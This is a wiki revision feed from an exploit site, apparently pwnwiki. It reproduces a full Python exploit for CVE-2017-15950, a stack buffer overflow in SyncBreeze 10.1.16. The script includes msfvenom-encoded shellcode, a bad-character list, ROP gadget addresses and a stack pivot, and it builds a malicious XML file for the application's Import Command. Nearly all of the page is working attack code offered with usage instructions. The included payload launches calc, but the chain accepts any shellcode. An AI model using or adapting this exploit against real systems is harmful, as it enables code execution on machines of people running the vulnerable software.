https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2017-15950_SyncBreeze_10.1.16_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E CVE-2017-15950 SyncBreeze 10.1.16 緩衝區溢出漏洞 - Revision history 2026-04-15T01:02:40Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2017-15950_SyncBreeze_10.1.16_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=3616&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafae..." 2021-05-30T02:25:05Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafae...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow<br /> # Date: 03/27/2021<br /> # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com<br /> # Vendor: https://www.syncbreeze.com/<br /> # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html<br /> # Version: SyncBreeze v10.1.16 x86<br /> # Tested on: Windows 10 x64 (19042.867)<br /> # CVE: CVE-2017-15950<br /> <br /> Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. <br /> <br /> # -*- coding: utf-8 -*-<br /> <br /> import struct<br /> <br /> # badchars<br /> #\x00\x0a\x0d\x20\x27<br /> #\x81\x82\x83\x84\x85\x86\x87\x88<br /> #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90<br /> #\x91\x92\x93\x94\x95\x96\x97\x98<br /> #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0<br /> #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8<br /> #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0<br /> #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8<br /> #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0<br /> #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8<br /> #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0<br /> #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8<br /> #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0<br /> #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8<br /> #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0<br /> #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8<br /> #\xF9\xFA\xFB\xFC\xFD\xFE\xFF<br /> <br /> # Shellcode payload size: 432 bytes<br /> # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python<br /> <br /> shellcode = b&quot;&quot;<br /> shellcode += b&quot;\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49&quot;<br /> shellcode += b&quot;\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a&quot;<br /> shellcode += b&quot;\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51&quot;<br /> shellcode += b&quot;\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42&quot;<br /> shellcode += b&quot;\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69&quot;<br /> shellcode += b&quot;\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30&quot;<br /> shellcode += b&quot;\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e&quot;<br /> shellcode += b&quot;\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c&quot;<br /> shellcode += b&quot;\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66&quot;<br /> shellcode += b&quot;\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61&quot;<br /> shellcode += b&quot;\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65&quot;<br /> shellcode += b&quot;\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d&quot;<br /> shellcode += b&quot;\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36&quot;<br /> shellcode += b&quot;\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a&quot;<br /> shellcode += b&quot;\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a&quot;<br /> shellcode += b&quot;\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b&quot;<br /> shellcode += b&quot;\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70&quot;<br /> shellcode += b&quot;\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b&quot;<br /> shellcode += b&quot;\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39&quot;<br /> shellcode += b&quot;\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71&quot;<br /> shellcode += b&quot;\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54&quot;<br /> shellcode += b&quot;\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54&quot;<br /> shellcode += b&quot;\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71&quot;<br /> shellcode += b&quot;\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c&quot;<br /> shellcode += b&quot;\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68&quot;<br /> shellcode += b&quot;\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50&quot;<br /> shellcode += b&quot;\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31&quot;<br /> shellcode += b&quot;\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f&quot;<br /> shellcode += b&quot;\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44&quot;<br /> shellcode += b&quot;\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31&quot;<br /> shellcode += b&quot;\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33&quot;<br /> shellcode += b&quot;\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f&quot;<br /> shellcode += b&quot;\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78&quot;<br /> shellcode += b&quot;\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55&quot;<br /> shellcode += b&quot;\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63&quot;<br /> shellcode += b&quot;\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70&quot;<br /> shellcode += b&quot;\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74&quot;<br /> shellcode += b&quot;\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f&quot;<br /> shellcode += b&quot;\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43&quot;<br /> shellcode += b&quot;\x30\x41\x41&quot;<br /> <br /> <br /> # padding to crash buffer<br /> basura = struct.pack('&lt;L', 0x41414141) * 390<br /> <br /> # gadgets to move payload pointer into EAX<br /> GAD1 = struct.pack('&lt;L', 0x65235465) # XCHG EAX,EBP<br /> GAD2 = struct.pack('&lt;L', 0x6506537C) # CALL EAX<br /> <br /> # padding to reach buffer address stored in ebp<br /> basura2 = struct.pack('&lt;L', 0x41414141) * 56<br /> <br /> # padding for stack pivot<br /> <br /> padding = struct.pack('&lt;L', 0x41414141) * 4<br /> padding2 = struct.pack('&lt;L', 0x41414141) * 20<br /> <br /> # stack pivot to reach an area with more space for gadgets on the stack<br /> # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret<br /> <br /> pivot = struct.pack('&lt;L', 0x6506491c)<br /> <br /> # final payload<br /> <br /> fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode<br /> <br /> <br /> # write payload to xml file<br /> <br /> payload = open(&quot;xplSyncBreeze.xml&quot;, &quot;wb&quot;)<br /> payload.write(&quot;&lt;?xml version=\&quot;1.0\&quot; encoding=\&quot;UTF-8\&quot;?&gt;\n\n&quot;.encode('utf-8'))<br /> <br /> payload.write(&quot;&lt;sync name='&quot;.encode('utf-8'))<br /> payload.write(fruta)<br /> payload.write(&quot;'&gt;\n&lt;/sync&gt;\n&quot;.encode('utf-8'))<br /> <br /> payload.close()<br /> &lt;/pre&gt;</div> Pwnwiki